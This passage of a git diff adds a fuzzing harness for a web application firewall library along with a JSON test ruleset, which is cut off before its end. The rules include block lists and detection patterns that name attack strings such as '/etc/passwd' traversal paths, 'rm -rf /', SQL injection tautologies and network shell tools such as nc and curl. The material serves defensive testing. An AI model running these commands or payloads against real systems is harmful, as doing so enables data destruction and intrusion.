ddwaf_object_map(&body_obj); + ddwaf_object_array(&items_array); + ddwaf_object_array(&products_array); + ddwaf_object_array(&tags_array); + ddwaf_object_map(&item1); + ddwaf_object_map(&item2); + ddwaf_object_map(&item3); + ddwaf_object_map(&product1); + ddwaf_object_map(&product2); + ddwaf_object_map(&nested_obj); + + // Create array items with different structures and types + ddwaf_object_map_addl(&item1, "id", 2, ddwaf_object_signed(&id1_tmp, 1)); + ddwaf_object_map_addl(&item1, "name", 4, ddwaf_object_stringl(&name1_tmp, "item1", 5)); + + ddwaf_object_map_addl(&item2, "id", 2, ddwaf_object_signed(&id2_tmp, 2)); + ddwaf_object_map_addl(&item2, "name", 4, 
ddwaf_object_stringl(&name2_tmp, "item2", 5)); + + ddwaf_object_map_addl(&item3, "id", 2, ddwaf_object_signed(&id3_tmp, 3)); + ddwaf_object_map_addl(&item3, "name", 4, ddwaf_object_stringl(&name3_tmp, "item3", 5)); + + // Create products with mixed data types for schema diversity + ddwaf_object_map_addl(&product1, "price", 5, ddwaf_object_float(&price1_tmp, 29.99)); + ddwaf_object_map_addl( + &product1, "available", 9, ddwaf_object_bool(&available1_tmp, true)); + ddwaf_object_map_addl(&product2, "price", 5, ddwaf_object_float(&price2_tmp, 49.99)); + ddwaf_object_map_addl( + &product2, "available", 9, ddwaf_object_bool(&available2_tmp, false)); + + // Create nested tags array + ddwaf_object_stringl(&tag1, "electronics", 11); + ddwaf_object_stringl(&tag2, "gadgets", 7); + ddwaf_object_array_add(&tags_array, &tag1); + ddwaf_object_array_add(&tags_array, &tag2); + + ddwaf_object_array_add(&items_array, &item1); + ddwaf_object_array_add(&items_array, &item2); + ddwaf_object_array_add(&items_array, &item3); + + ddwaf_object_array_add(&products_array, &product1); + ddwaf_object_array_add(&products_array, &product2); + + ddwaf_object_map_addl( + &nested_obj, "category", 8, ddwaf_object_stringl(&category_tmp, "shopping", 8)); + ddwaf_object_map_addl(&nested_obj, "tags", 4, &tags_array); + + ddwaf_object_map_addl(&body_obj, "items", 5, &items_array); + ddwaf_object_map_addl(&body_obj, "products", 8, &products_array); + ddwaf_object_map_addl(&body_obj, "metadata", 8, &nested_obj); + ddwaf_object_map_addl(&root, "server.request.body", 19, &body_obj); + break; + } + case 2: { + // Shell command array structure for shi_common.cpp coverage + ddwaf_object body_obj, cmd_array; + ddwaf_object cmd_part; + + ddwaf_object_map(&body_obj); + ddwaf_object_array(&cmd_array); + + auto cmd_set = splitter.get() % shell_commands.size(); + const auto &selected_cmd = shell_commands[cmd_set]; + for (int i = 0; i < selected_cmd.size(); i++) { + if (selected_cmd[i] != NULL) { + 
ddwaf_object_stringl(&cmd_part, selected_cmd[i], strlen(selected_cmd[i])); + ddwaf_object_array_add(&cmd_array, &cmd_part); + } + } + + ddwaf_object_map_addl(&body_obj, "command", 7, &cmd_array); + ddwaf_object_map_addl(&root, "server.request.body", 19, &body_obj); + break; + } + case 3: { + // Deep nested structure to test extract_schema max_container_depth limits + ddwaf_object body_obj, level1, level2, level3, level4, level5, level6, level7, level8, + level9, level10; + ddwaf_object level11, level12, level13, level14, level15, level16, level17, level18, + level19, level20; + ddwaf_object deep_value, mixed_array, array_item1, array_item2; + + ddwaf_object_map(&body_obj); + ddwaf_object_map(&level1); + ddwaf_object_map(&level2); + ddwaf_object_map(&level3); + ddwaf_object_map(&level4); + ddwaf_object_map(&level5); + ddwaf_object_map(&level6); + ddwaf_object_map(&level7); + ddwaf_object_map(&level8); + ddwaf_object_map(&level9); + ddwaf_object_map(&level10); + ddwaf_object_map(&level11); + ddwaf_object_map(&level12); + ddwaf_object_map(&level13); + ddwaf_object_map(&level14); + ddwaf_object_map(&level15); + ddwaf_object_map(&level16); + ddwaf_object_map(&level17); + ddwaf_object_map(&level18); + ddwaf_object_map(&level19); + ddwaf_object_map(&level20); + ddwaf_object_array(&mixed_array); + ddwaf_object_map(&array_item1); + ddwaf_object_map(&array_item2); + + // Create very deep nesting that exceeds max_container_depth (18) + ddwaf_object_stringl(&deep_value, "deep_nested_value", 17); + ddwaf_object_map_addl(&level20, "final", 5, &deep_value); + ddwaf_object_map_addl(&level19, "level20", 7, &level20); + ddwaf_object_map_addl(&level18, "level19", 7, &level19); + ddwaf_object_map_addl(&level17, "level18", 7, &level18); + ddwaf_object_map_addl(&level16, "level17", 7, &level17); + ddwaf_object_map_addl(&level15, "level16", 7, &level16); + ddwaf_object_map_addl(&level14, "level15", 7, &level15); + ddwaf_object_map_addl(&level13, "level14", 7, &level14); + 
ddwaf_object_map_addl(&level12, "level13", 7, &level13); + ddwaf_object_map_addl(&level11, "level12", 7, &level12); + ddwaf_object_map_addl(&level10, "level11", 7, &level11); + ddwaf_object_map_addl(&level9, "level10", 7, &level10); + ddwaf_object_map_addl(&level8, "level9", 6, &level9); + ddwaf_object_map_addl(&level7, "level8", 6, &level8); + ddwaf_object_map_addl(&level6, "level7", 6, &level7); + ddwaf_object_map_addl(&level5, "level6", 6, &level6); + ddwaf_object_map_addl(&level4, "level5", 6, &level5); + ddwaf_object_map_addl(&level3, "level4", 6, &level4); + ddwaf_object_map_addl(&level2, "level3", 6, &level3); + ddwaf_object_map_addl(&level1, "level2", 6, &level2); + + // Add array items to test array limits + ddwaf_object array_val1, array_val2; + ddwaf_object_map_addl(&array_item1, "id", 2, ddwaf_object_signed(&array_val1, 1)); + ddwaf_object_map_addl(&array_item2, "id", 2, ddwaf_object_signed(&array_val2, 2)); + ddwaf_object_array_add(&mixed_array, &array_item1); + ddwaf_object_array_add(&mixed_array, &array_item2); + + ddwaf_object_map_addl(&body_obj, "deep_structure", 14, &level1); + ddwaf_object_map_addl(&body_obj, "mixed_array", 11, &mixed_array); + ddwaf_object_map_addl(&root, "server.request.body", 19, &body_obj); + break; + } + default: { + // Simple body structure + ddwaf_object_map_addl(&root, "server.request.body", 19, + ddwaf_object_stringl(&tmp, body.data(), body.size())); + break; + } + } + + if (method_index < http_methods.size()) { + const char *selected_method = http_methods[method_index]; + ddwaf_object_map_addl(&root, "server.request.method", 21, + ddwaf_object_stringl(&tmp, selected_method, strlen(selected_method))); + } else { + // Use the method string directly as fallback + ddwaf_object_map_addl(&root, "server.request.method", 21, + ddwaf_object_stringl(&tmp, method.data(), method.size())); + } + + // Add Authorization header with JWT token for jwt_decode processor + ddwaf_object headers_obj, auth_tmp; + 
ddwaf_object_map(&headers_obj); + + if (jwt_index < jwt_tokens.size()) { + const char *selected_jwt = jwt_tokens[jwt_index]; + ddwaf_object_map_addl(&headers_obj, "authorization", 13, + ddwaf_object_stringl(&auth_tmp, selected_jwt, strlen(selected_jwt))); + } else { + // Use a default JWT token + const char *default_jwt = jwt_tokens[0]; + ddwaf_object_map_addl(&headers_obj, "authorization", 13, + ddwaf_object_stringl(&auth_tmp, default_jwt, strlen(default_jwt))); + } + + ddwaf_object_map_addl(&root, "server.request.headers.no_cookies", 33, &headers_obj); + + // Add cookies to exercise session_fingerprint and kv_hash_fields + ddwaf_object cookies_obj; + ddwaf_object_map(&cookies_obj); + auto cookie_idx = splitter.get() % cookie_pairs.size(); + const auto &[key, value] = cookie_pairs[cookie_idx]; + ddwaf_object cookie_value; + ddwaf_object_map_addl(&cookies_obj, key, strlen(key), + ddwaf_object_stringl(&cookie_value, value, strlen(value))); + ddwaf_object_map_addl(&root, "server.request.cookies", 22, &cookies_obj); + + // Add session and user data + auto session_idx = splitter.get() % session_ids.size(); + auto user_idx = splitter.get() % user_ids.size(); + ddwaf_object_map_addl(&root, "usr.session_id", 14, + ddwaf_object_stringl(&tmp, session_ids[session_idx], strlen(session_ids[session_idx]))); + ddwaf_object_map_addl(&root, "usr.id", 6, + ddwaf_object_stringl(&tmp, user_ids[user_idx], strlen(user_ids[user_idx]))); + + break; + } + case 1: { + // Network/IP focused structure + auto ip_index = splitter.get(); + auto url_index = splitter.get(); + auto client_ip = splitter.get_string(); + auto url = splitter.get_string(); + + if (ip_index < ip_addresses.size()) { + const char *selected_ip = ip_addresses[ip_index]; + ddwaf_object_map_addl(&root, "http.client_ip", 14, + ddwaf_object_stringl(&tmp, selected_ip, strlen(selected_ip))); + } else { + // Use the client_ip string directly as fallback + ddwaf_object_map_addl(&root, "http.client_ip", 14, + 
ddwaf_object_stringl(&tmp, client_ip.data(), client_ip.size())); + } + + if (url_index < ssrf_urls.size()) { + const char *selected_url = ssrf_urls[url_index]; + ddwaf_object_map_addl(&root, "server.io.net.url", 17, + ddwaf_object_stringl(&tmp, selected_url, strlen(selected_url))); + } else { + // Use the url string directly as fallback + ddwaf_object_map_addl( + &root, "server.io.net.url", 17, ddwaf_object_stringl(&tmp, url.data(), url.size())); + } + break; + } + case 2: { + // Database focused structure + auto db_statement_index = splitter.get(); + auto db_type_index = splitter.get(); + auto db_system = splitter.get_string(); + auto query_param_index = splitter.get(); + auto query_param = splitter.get_string(); + + if (db_statement_index < sql_statements.size()) { + const char *selected_sql = sql_statements[db_statement_index]; + ddwaf_object_map_addl(&root, "server.db.statement", 19, + ddwaf_object_stringl(&tmp, selected_sql, strlen(selected_sql))); + } else { + // Use the db_system string directly as fallback + ddwaf_object_map_addl(&root, "server.db.statement", 19, + ddwaf_object_stringl(&tmp, db_system.data(), db_system.size())); + } + + if (db_type_index < db_types.size()) { + const char *selected_db = db_types[db_type_index]; + ddwaf_object_map_addl(&root, "server.db.system", 16, + ddwaf_object_stringl(&tmp, selected_db, strlen(selected_db))); + } else { + // Use the db_system string directly as fallback + ddwaf_object_map_addl(&root, "server.db.system", 16, + ddwaf_object_stringl(&tmp, db_system.data(), db_system.size())); + } + + if (query_param_index < query_params.size()) { + const char *selected_query_param = query_params[query_param_index]; + ddwaf_object_map_addl(&root, "server.request.query", 20, + ddwaf_object_stringl(&tmp, selected_query_param, strlen(selected_query_param))); + } else { + // Use the query_param string directly as fallback + ddwaf_object_map_addl(&root, "server.request.query", 20, + ddwaf_object_stringl(&tmp, query_param.data(), 
query_param.size())); + } + break; + } + case 3: { + // Headers, cookies, and user session structure + auto headers_key_index = splitter.get(); + auto headers_value_index = splitter.get(); + auto headers = splitter.get_string(); + + auto cookies_index = splitter.get(); + auto cookies = splitter.get_string(); + + auto session_id_index = splitter.get(); + auto session_id = splitter.get_string(); + + auto user_id_index = splitter.get(); + auto user_id = splitter.get_string(); + + auto jwt_index = splitter.get(); + auto jwt = splitter.get_string(); + + ddwaf_object headers_obj, cookies_obj; + ddwaf_object_map(&headers_obj); + // cookies_obj will be initialized later as a proper map + + if (headers_key_index < sizeof(http_headers_keys) / sizeof(http_headers_keys[0]) && + headers_value_index < sizeof(http_headers_values) / sizeof(http_headers_values[0])) { + const char *selected_headers_key = http_headers_keys[headers_key_index]; + const char *selected_headers_value = http_headers_values[headers_value_index]; + ddwaf_object_map_addl(&headers_obj, selected_headers_key, strlen(selected_headers_key), + ddwaf_object_stringl(&tmp, selected_headers_value, strlen(selected_headers_value))); + + } else { + // Use the headers string directly as fallback + ddwaf_object_map_addl(&headers_obj, "content-type", 12, + ddwaf_object_stringl(&tmp, headers.data(), headers.size())); + } + + // Add Authorization header with JWT token for jwt_decode processor + ddwaf_object auth_tmp; + if (jwt_index < jwt_tokens.size()) { + const char *selected_jwt = jwt_tokens[jwt_index]; + ddwaf_object_map_addl(&headers_obj, "authorization", 13, + ddwaf_object_stringl(&auth_tmp, selected_jwt, strlen(selected_jwt))); + } else { + ddwaf_object_map_addl(&headers_obj, "authorization", 13, + ddwaf_object_stringl(&auth_tmp, jwt.data(), jwt.size())); + } + + // Create cookies as a proper key-value map to exercise kv_hash_fields + ddwaf_object_map(&cookies_obj); + if (cookies_index < cookie_pairs.size()) { + // Use 
predefined cookie pairs that exercise normalize_key/normalize_value + auto num_cookies = (cookies_index % 3) + 1; // 1-3 cookies + for (int i = 0; i < num_cookies && (cookies_index + i) < cookie_pairs.size(); i++) { + const auto &[key, value] = cookie_pairs[cookies_index + i]; + ddwaf_object cookie_value; + ddwaf_object_map_addl(&cookies_obj, key, strlen(key), + ddwaf_object_stringl(&cookie_value, value, strlen(value))); + } + } else { + // Create a fallback cookie from fuzz data + ddwaf_object cookie_value; + ddwaf_object_map_addl(&cookies_obj, "fuzz_cookie", 11, + ddwaf_object_stringl(&cookie_value, cookies.data(), cookies.size())); + } + + // Add session_id and user_id directly to root (they are string values, not maps) + if (session_id_index < session_ids.size()) { + const char *selected_session_id = session_ids[session_id_index]; + ddwaf_object_map_addl(&root, "usr.session_id", 14, + ddwaf_object_stringl(&tmp, selected_session_id, strlen(selected_session_id))); + } else { + // Use the session_id string directly as fallback + ddwaf_object_map_addl(&root, "usr.session_id", 14, + ddwaf_object_stringl(&tmp, session_id.data(), session_id.size())); + } + + if (user_id_index < user_ids.size()) { + const char *selected_user_id = user_ids[user_id_index]; + ddwaf_object_map_addl(&root, "usr.id", 6, + ddwaf_object_stringl(&tmp, selected_user_id, strlen(selected_user_id))); + } else { + // Use the user_id string directly as fallback + ddwaf_object_map_addl( + &root, "usr.id", 6, ddwaf_object_stringl(&tmp, user_id.data(), user_id.size())); + } + + ddwaf_object_map_addl(&root, "server.request.headers", 20, &headers_obj); + ddwaf_object_map_addl(&root, "server.request.cookies", 22, &cookies_obj); + break; + } + case 4: { + // Large array structure to test extract_schema max_array_nodes limits + auto large_array_size = splitter.get() % 20 + 5; // 5-24 items + + ddwaf_object body_obj, large_array, headers_obj, auth_tmp; + ddwaf_object_map(&body_obj); + 
ddwaf_object_array(&large_array); + ddwaf_object_map(&headers_obj); + + // Create a large array that exceeds max_array_nodes (10) + for (int i = 0; i < large_array_size; i++) { + auto data = splitter.get_string(); + ddwaf_object item, id_tmp, data_tmp; + ddwaf_object_map(&item); + ddwaf_object_map_addl(&item, "id", 2, ddwaf_object_signed(&id_tmp, i)); + ddwaf_object_map_addl( + &item, "data", 4, ddwaf_object_stringl(&data_tmp, data.data(), data.size())); + ddwaf_object_array_add(&large_array, &item); + } + + ddwaf_object_map_addl(&body_obj, "large_collection", 16, &large_array); + ddwaf_object_map_addl(&root, "server.request.body", 19, &body_obj); + break; + } + case 5: { + ddwaf_object resource_obj; + ddwaf_object_map(&resource_obj); + // Hard generator of random resources + auto custom_resource_index = splitter.get(); + auto custom_resource_name = splitter.get_string(); + + // We don't set a default set of values, we let the fuzzer generate it. + auto custom_resource_value = splitter.get_string(); + + if (custom_resource_index < custom_resources_names.size()) { + const char *selected_custom_resource_name = + custom_resources_names[custom_resource_index]; + ddwaf_object_map_addl(&resource_obj, selected_custom_resource_name, + strlen(selected_custom_resource_name), + ddwaf_object_stringl( + &tmp, custom_resource_value.data(), custom_resource_value.size())); + } else { + // Use the custom_resource_name string directly as fallback + ddwaf_object_map_addl(&resource_obj, custom_resource_name.data(), + custom_resource_name.size(), + ddwaf_object_stringl( + &tmp, custom_resource_value.data(), custom_resource_value.size())); + } + ddwaf_object_map_addl(&root, "server.request.headers", 20, &resource_obj); + break; + } + } + + return root; +} + +// Initialize WAF with simple_rules.json configuration +// This is done only once because the ruleset is static for a fuzzer, but is very costly to load. 
+ddwaf_handle initialize_waf() +{ + try { + // Use the simple_rules.json configuration for better coverage + std::string json_string{embedded_configs::simple_rules_json}; + ddwaf_object ruleset = json_to_object(json_string); + + // Initialize WAF + ddwaf_config config{{0, 0, 0}, {nullptr, nullptr}, ddwaf_object_free}; + ddwaf_object diagnostics; + ddwaf_handle handle = ddwaf_init(&ruleset, &config, &diagnostics); + + ddwaf_object_free(&ruleset); + ddwaf_object_free(&diagnostics); + + if (handle == nullptr) { + // WAF initialization failed - crash + __builtin_trap(); + } + + return handle; + } catch (...) { + // Rule loading failed - crash immediately + __builtin_trap(); + } +} + +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) +{ + // Set up memory resource + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + + // Initialize WAF once with simple_rules.json + g_waf_handle = initialize_waf(); + if (g_waf_handle == nullptr) { + // WAF initialization failed - crash + __builtin_trap(); + } + + // Initialize global context once for reuse across all test cases + g_waf_context = ddwaf_context_init(g_waf_handle); + if (g_waf_context == nullptr) { + // Context initialization failed - crash + __builtin_trap(); + } + + // Exercise ddwaf_known_addresses and ddwaf_known_actions API functions + uint32_t addresses_size = 0; + const char *const *addresses = ddwaf_known_addresses(g_waf_handle, &addresses_size); + prevent_optimization(addresses); + prevent_optimization(addresses_size); + + uint32_t actions_size = 0; + const char *const *actions = ddwaf_known_actions(g_waf_handle, &actions_size); + prevent_optimization(actions); + prevent_optimization(actions_size); + + return 0; +} + +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) +{ + // Limit payload size to 128KB to prevent excessive memory usage + constexpr size_t MAX_PAYLOAD_SIZE = 128 * 1024; + if (size > MAX_PAYLOAD_SIZE || size < 3) { + return 0; + } + + 
InputSplitter splitter(data, size); + + uint8_t fuzz_mode = splitter.get() % 2; + switch (fuzz_mode) { + case 0: { + ddwaf_object request = create_request_object(splitter); + ddwaf_object result; + ddwaf_object_invalid(&result); // Initialize result object + + uint64_t timeout = 5000; // 5ms timeout for deeper exploration + DDWAF_RET_CODE code = ddwaf_run(g_waf_context, nullptr, &request, &result, timeout); + + ddwaf_object_free(&result); + prevent_optimization(code); + break; + } + case 1: { + uint8_t num_requests = (splitter.get() % 20) + 1; // 1-20 requests + for (uint8_t i = 0; i < num_requests && splitter.has_data(); i++) { + ddwaf_object request = create_request_object(splitter); + ddwaf_object result; + ddwaf_object_invalid(&result); // Initialize result object + + uint64_t timeout = 5000; // 5ms timeout + DDWAF_RET_CODE code = ddwaf_run(g_waf_context, nullptr, &request, &result, timeout); + + ddwaf_object_free(&result); + prevent_optimization(code); + } + + break; + } + default: { + // It shouldn't be possible to end up here, so crashing explicitly + __builtin_trap(); + } + } + + return 0; +} + +// Custom cleanup function for when the fuzzer process exits +__attribute__((destructor)) static void cleanup_waf() +{ + if (g_waf_context != nullptr) { + ddwaf_context_destroy(g_waf_context); + g_waf_context = nullptr; + } + if (g_waf_handle != nullptr) { + ddwaf_destroy(g_waf_handle); + g_waf_handle = nullptr; + } +} + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("e2e_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/e2e/src/ruleset/simple_rules.json b/fuzzer/e2e/src/ruleset/simple_rules.json new file mode 100644 index 000000000..37fe888d0 --- /dev/null +++ b/fuzzer/e2e/src/ruleset/simple_rules.json @@ -0,0 +1,1716 @@ +{ + "version": "2.2", + "rules": [ + { + "id": "basic-regex-rule", + "name": "Basic regex matching rule", + "tags": { + "type": "security_scanner", + "category": 
"attack_attempt" + }, + "conditions": [ + { + "operator": "match_regex", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ], + "regex": "(?i)(union.*select|select.*from|insert.*into|delete.*from|drop.*table|script.*alert|javascript:|vbscript:|onload=|onerror=|eval\\(|setTimeout\\()" + } + } + ], + "transformers": ["lowercase", "url_decode"], + "on_match": ["block"] + }, + { + "id": "phrase-match-rule", + "name": "Phrase matching with Aho-Corasick", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "server.request.headers.no_cookies" + } + ], + "list": [ + "admin", + "root", + "passwd", + "shadow", + "config", + "backup", + "database", + "mysql", + "postgresql", + "oracle", + "mongodb", + "redis", + "memcached", + "elasticsearch", + "secret", + "token", + "key", + "password", + "credential", + "private", + "confidential", + "internal", + "staging", + "development", + "test", + "debug", + "trace", + "log", + "error", + "exception", + "exploit", + "payload", + "shellcode", + "backdoor", + "injection", + "xss", + "csrf", + "ssrf", + "lfi", + "rfi", + "sqli", + "traversal", + "bypass", + "evasion", + "obfuscation", + "encoding", + "ssl", + "tls", + "https", + "ssh", + "ftp", + "smtp", + "dns", + "ldap", + "oauth", + "jwt", + "saml" + ] + } + } + ], + "transformers": ["lowercase", "url_decode"], + "on_match": ["block"] + }, + { + "id": "phrase-match-word-boundary-rule", + "name": "Phrase matching with word boundaries", + "tags": { + "type": "security_scanner", + "category": "sql_keywords" + }, + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": 
"server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "server.db.statement" + } + ], + "list": [ + "SELECT", + "INSERT", + "UPDATE", + "DELETE", + "DROP", + "CREATE", + "ALTER", + "TRUNCATE", + "UNION", + "JOIN", + "WHERE", + "FROM", + "INTO", + "VALUES", + "SET", + "ORDER", + "GROUP", + "HAVING", + "LIMIT", + "OFFSET", + "INDEX", + "TABLE", + "DATABASE", + "SCHEMA", + "VIEW", + "PROCEDURE", + "FUNCTION", + "TRIGGER", + "GRANT", + "REVOKE", + "COMMIT", + "ROLLBACK", + "EXEC", + "EXECUTE", + "CAST", + "CONVERT", + "SUBSTRING", + "CONCAT", + "LENGTH", + "UPPER", + "LOWER", + "TRIM", + "REPLACE", + "LIKE", + "REGEXP", + "MATCH" + ], + "enforce_word_boundary": true + } + } + ], + "transformers": ["uppercase"], + "on_match": ["block"] + }, + { + "id": "xss-detector-rule", + "name": "XSS detection rule", + "tags": { + "type": "security_scanner", + "category": "xss" + }, + "conditions": [ + { + "operator": "is_xss", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "server.request.headers.no_cookies" + } + ] + } + } + ], + "transformers": ["html_entity_decode", "url_decode"], + "on_match": ["block"] + }, + { + "id": "sqli-detector-rule", + "name": "SQL injection detection rule", + "tags": { + "type": "security_scanner", + "category": "sqli" + }, + "conditions": [ + { + "operator": "is_sqli", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "server.db.statement" + } + ] + } + } + ], + "transformers": ["lowercase", "url_decode", "remove_comments"], + "on_match": ["block"] + }, + { + "id": "sqli-detector-v2-rule", + "name": "Advanced SQL injection detection with tokenizer", + "tags": { + "type": "security_scanner", + "category": "sqli" + }, + "conditions": [ + { + "operator": "sqli_detector@v2", + "parameters": { + "resource": [ + { + "address": "server.db.statement" 
+ } + ], + "params": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ], + "db_type": [ + { + "address": "server.db.system" + } + ] + } + } + ], + "on_match": ["block"] + }, + { + "id": "shell-injection-rule", + "name": "Shell injection detection with tokenizer", + "tags": { + "type": "security_scanner", + "category": "shell_injection" + }, + "conditions": [ + { + "operator": "shi_detector@v1", + "parameters": { + "resource": [ + { + "address": "server.request.query" + } + ], + "params": [ + { + "address": "server.request.body" + } + ] + } + } + ], + "on_match": ["block"] + }, + { + "id": "exact-match-rule", + "name": "Exact match for common attacks", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "exact_match", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + } + ], + "list": [ + "/etc/passwd", + "/etc/shadow", + "../../../../etc/passwd", + "..\\..\\..\\windows\\system32\\config\\sam", + "SELECT * FROM users", + "1' OR '1'='1", + "", + "javascript:alert(1)", + "", + "rm -rf /", + "cat /etc/passwd" + ] + } + } + ], + "on_match": ["block"] + }, + { + "id": "ip-match-rule", + "name": "IP address matching rule", + "tags": { + "type": "security_scanner", + "category": "network_security" + }, + "conditions": [ + { + "operator": "ip_match", + "parameters": { + "inputs": [ + { + "address": "http.client_ip" + }, + { + "address": "server.io.net.url" + } + ], + "list": [ + "127.0.0.1", + "10.0.0.0/8", + "192.168.0.0/16", + "172.16.0.0/12", + "169.254.0.0/16", + "::1", + "fc00::/7" + ] + } + } + ], + "on_match": ["block"] + }, + { + "id": "exists-rule", + "name": "Parameter existence check", + "tags": { + "type": "security_scanner", + "category": "parameter_validation" + }, + "conditions": [ + { + "operator": "exists", + "parameters": { + "inputs": [ + { + "address": "server.request.cookies" + }, 
+ { + "address": "server.request.headers.no_cookies" + } + ] + } + } + ], + "on_match": ["monitor"] + }, + { + "id": "url-transformer-rule", + "name": "URL path and querystring transformer testing", + "tags": { + "type": "security_scanner", + "category": "url_analysis" + }, + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + } + ], + "list": [ + "admin", + "config", + "backup", + "test", + "debug", + "api", + "login", + "auth", + "password", + "secret" + ] + } + } + ], + "transformers": ["url_path", "url_querystring", "url_decode"], + "on_match": ["block"] + }, + { + "id": "encoding-transformer-rule", + "name": "Various encoding transformer testing", + "tags": { + "type": "security_scanner", + "category": "encoding_attacks" + }, + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.body" + }, + { + "address": "server.request.headers.no_cookies" + } + ], + "list": [ + "script", + "alert", + "eval", + "javascript", + "vbscript", + "onload", + "onerror", + "onclick", + "onmouseover", + "iframe", + "object", + "embed", + "applet", + "meta", + "link", + "style", + "img", + "svg", + "xml", + "xsl" + ] + } + } + ], + "transformers": [ + "base64_decode", + "html_entity_decode", + "css_decode", + "unicode_normalize" + ], + "on_match": ["block"] + }, + { + "id": "shell-transformer-rule", + "name": "Shell and command injection transformer testing", + "tags": { + "type": "security_scanner", + "category": "command_injection" + }, + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ], + "list": [ + "bash", + "sh", + "cmd", + "powershell", + "system", + "exec", + "eval", + "popen", + "subprocess", + "shell_exec", + "passthru", + "proc_open", + "backticks", + "cat", + "ls", + 
"pwd", + "whoami", + "id", + "uname", + "netstat", + "ps", + "kill", + "chmod", + "chown", + "rm", + "mv", + "cp", + "mkdir", + "rmdir", + "wget", + "curl", + "nc", + "ncat", + "telnet", + "ssh", + "scp", + "rsync" + ] + } + } + ], + "transformers": ["shell_unescape", "remove_nulls", "compress_whitespace"], + "on_match": ["block"] + }, + { + "id": "base64-encoder-rule", + "name": "Base64 encoding transformer testing", + "tags": { + "type": "security_scanner", + "category": "encoding_detection" + }, + "conditions": [ + { + "operator": "phrase_match", + "parameters": { + "inputs": [ + { + "address": "server.request.body" + }, + { + "address": "server.request.headers.no_cookies" + } + ], + "list": [ + "payload", + "exploit", + "shellcode", + "backdoor", + "trojan", + "malware", + "virus", + "worm", + "rootkit", + "keylogger", + "spyware", + "adware", + "ransomware", + "cryptolocker", + "petya", + "wannacry", + "stuxnet", + "conficker", + "zeus", + "banking", + "credential", + "stealer", + "botnet", + "c2", + "command", + "control" + ] + } + } + ], + "transformers": ["base64_encode", "compress_whitespace", "remove_nulls"], + "on_match": ["block"] + }, + { + "id": "ip-data-rule", + "name": "Rule using IP data", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "ip_match", + "parameters": { + "inputs": [ + { + "address": "http.client_ip" + } + ], + "data": "blocked_ips" + } + } + ], + "on_match": ["block_request_action"] + }, + { + "id": "user-data-rule", + "name": "Rule using user data", + "tags": { + "type": "security_scanner", + "category": "attack_attempt" + }, + "conditions": [ + { + "operator": "exact_match", + "parameters": { + "inputs": [ + { + "address": "usr.id" + } + ], + "data": "blocked_users" + } + } + ], + "on_match": ["redirect_action"] + }, + { + "id": "comprehensive-transformer-rule", + "name": "Multiple transformer combination testing", + "tags": { + "type": "security_scanner", + 
"category": "comprehensive_analysis" + }, + "conditions": [ + { + "operator": "exact_match", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + } + ], + "list": [ + "test", + "admin", + "root", + "config", + "backup", + "debug", + "trace", + "log", + "error", + "exception", + "stack", + "dump", + "core", + "crash" + ] + } + } + ], + "transformers": [ + "url_decode", + "html_entity_decode", + "css_decode", + "base64_decode", + "shell_unescape", + "unicode_normalize", + "remove_nulls", + "compress_whitespace", + "lowercase" + ], + "on_match": ["monitor"] + }, + { + "id": "hidden-ascii-rule", + "name": "Hidden ASCII character detection", + "tags": { + "type": "security_scanner", + "category": "hidden_chars" + }, + "conditions": [ + { + "operator": "hidden_ascii_match", + "parameters": { + "inputs": [ + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "server.request.headers.no_cookies" + } + ] + } + } + ], + "on_match": ["block"] + }, + { + "id": "equals-string-rule", + "name": "String equality matching", + "tags": { + "type": "security_scanner", + "category": "exact_string_match" + }, + "conditions": [ + { + "operator": "equals", + "parameters": { + "inputs": [ + { + "address": "server.request.method" + }, + { + "address": "server.request.uri_raw" + }, + { + "address": "server.request.query" + } + ], + "type": "string", + "value": "admin" + } + } + ], + "on_match": ["block"] + }, + { + "id": "equals-signed-int-rule", + "name": "Signed integer equality matching", + "tags": { + "type": "security_scanner", + "category": "numeric_match" + }, + "conditions": [ + { + "operator": "equals", + "parameters": { + "inputs": [ + { + "address": "server.request.query" + }, + { + "address": "server.request.body" + }, + { + "address": "usr.id" + } + ], + "type": 
